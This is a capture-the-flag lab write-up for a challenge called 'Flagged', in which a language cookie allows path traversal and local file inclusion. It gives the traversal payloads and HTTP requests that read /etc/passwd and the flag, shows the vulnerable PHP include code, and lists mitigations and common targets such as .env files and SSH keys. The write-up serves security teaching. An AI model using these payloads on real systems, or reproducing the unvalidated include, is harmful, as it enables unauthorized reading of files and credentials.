Local File Inclusion via Language Cookie Leads to Arbitrary File Read | Flagged
Lab Link
Lab: Flagged
Overview
Flagged is a long-running online storefront that manufactures custom sailing flags and supports multiple languages through a language-switching feature. The application allows visitors to select their preferred language, and the chosen value is stored within a cookie.
During testing, the language selection mechanism was found to trust user-supplied input without proper validation. By manipulating the language cookie, it became possible to perform path traversal and include arbitrary files from the server’s filesystem.
This ultimately allowed access to sensitive files outside the intended language directory and resulted in disclosure of the challenge flag.
Objective
Exploit the language selection functionality to perform Local File Inclusion and retrieve the flag from the underlying filesystem.
Vulnerability Identification
Classification Hierarchy
1
2
3
4
A01 - Broken Access Control
└── Local File Inclusion
└── Path Traversal
└── User-Controlled Language File Loading
Reconnaissance
The application provides a language-switching feature allowing visitors to browse the website in multiple languages.
Available languages include:
1
2
3
4
English
French
Dutch
Spanish
While changing languages, the following request was observed:
1
2
3
GET /shop.php HTTP/2
Host: a41ea65a-4065-flagged-8cc5e.events.webverselabs-pro.com
Cookie: lang=es
The presence of a language identifier stored directly within a cookie suggested that the backend might be loading language files dynamically based on user input.
Analyzing the Language Cookie
The application appears to use the cookie value to determine which language file should be loaded.
Observed cookie:
1
lang=es
If the value is incorporated directly into filesystem operations, path traversal characters may allow access to files outside the expected language directory.
Testing for Path Traversal
A path traversal payload was supplied within the cookie:
1
../../../../../../etc/passwd
Modified request:
1
2
3
GET /shop.php HTTP/2
Host: a41ea65a-4065-flagged-8cc5e.events.webverselabs-pro.com
Cookie: lang=../../../../../../etc/passwd
The response returned contents from the operating system’s password file, confirming that the application was vulnerable to Local File Inclusion.
Confirming Local File Inclusion
Successful disclosure of:
1
/etc/passwd
demonstrated that arbitrary files could be read from the server.
This confirmed:
1
2
3
Path Traversal
+
Local File Inclusion
through the language cookie parameter.
Exploitation
After confirming file access, attention shifted toward discovering sensitive application files.
A common target in challenge environments is:
1
flag.txt
The following payload was supplied:
1
../../../flag.txt
Modified request:
1
2
3
GET /shop.php HTTP/2
Host: a41ea65a-4065-flagged-8cc5e.events.webverselabs-pro.com
Cookie: lang=../../../flag.txt
Flag Disclosure
The response returned:
1
WEBVERSE{.....}
The flag was successfully disclosed through Local File Inclusion.
Flag
1
WEBVERSE{.....}
Proof of Exploitation
Original cookie:
1
lang=es
Path traversal test:
1
lang=../../../../../../etc/passwd
Successful file disclosure:
1
/etc/passwd
Flag retrieval payload:
1
lang=../../../flag.txt
Result:
1
WEBVERSE{.....}
Root Cause Analysis
The application uses a user-controlled cookie value when selecting language resources.
A vulnerable implementation would resemble:
1
include("languages/" . $_COOKIE['lang']);
or
1
include($_COOKIE['lang']);
Because user input is not validated, attackers can inject traversal sequences such as:
1
../
to escape the intended directory and access arbitrary files on the filesystem.
The absence of path validation and allowlisting results in Local File Inclusion.
Impact
An attacker can:
- Read arbitrary files from the server
- Access application source code
- Retrieve configuration files
- Obtain credentials and secrets
- Enumerate system users
- Access sensitive application data
In some environments, Local File Inclusion can be escalated into Remote Code Execution.
Mitigation
Use an Allowlist
Only permit predefined language values:
1
$allowed = ['en', 'fr', 'es', 'nl'];
Reject any value outside the approved list.
Prevent Directory Traversal
Block traversal sequences such as:
1
2
../
..\
before performing filesystem operations.
Use Fixed Mappings
Instead of directly loading user-supplied paths:
1
include($_COOKIE['lang']);
Use:
1
2
3
4
5
6
7
8
$languages = [
'en' => 'languages/en.php',
'fr' => 'languages/fr.php',
'es' => 'languages/es.php',
'nl' => 'languages/nl.php'
];
include($languages[$lang]);
Restrict File Access
Configure application permissions so web processes cannot access sensitive files outside required directories.
Real-World Insight
Local File Inclusion vulnerabilities frequently arise in multilingual applications, template engines, and file-loading features where developers allow user input to influence filesystem operations.
Common attack targets include:
1
2
3
4
5
6
/etc/passwd
config.php
.env
application source code
SSH keys
log files
The Flagged challenge demonstrates a critical security principle:
User input should never directly determine which files are loaded from the server’s filesystem.